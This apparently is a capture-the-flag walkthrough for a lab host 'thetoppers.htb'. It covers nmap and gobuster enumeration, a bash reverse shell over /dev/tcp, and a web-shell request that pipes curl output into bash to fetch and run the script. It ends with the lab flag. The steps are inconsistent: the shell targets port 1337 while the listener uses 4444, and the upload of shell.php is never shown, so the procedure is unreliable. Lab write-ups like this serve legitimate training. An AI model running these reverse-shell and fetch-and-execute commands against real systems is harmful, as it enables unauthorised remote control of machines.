As usual, let's start with map
nmap -sV targetIP
There is a website on port 80, open your browser and type the target IP (in this case 10.129.199.172)
Scroll down and we find this domain name thetoppers.htb
Let's use the word list subdomains-top1million-5000.txt already located on your Parrot VM to enumerate any subdomains
gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb 
We found a subdomain called s3.thetoppers.htb
Open your browser and go to s3.thetoppers.htb
Find out what your IP is using
ifconfigCheck out the IP in tun0
Create a new bash file called shell.sh
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1 Open a new terminal window and start listening with net cat on one window
nc -lnvp 4444Create a web server using the command below (make sure you are in the same directory as where shell.sh is located)
python3 -m http.server 8000 Go back to the browser and type in the url bar
http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash
The flag is located at var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b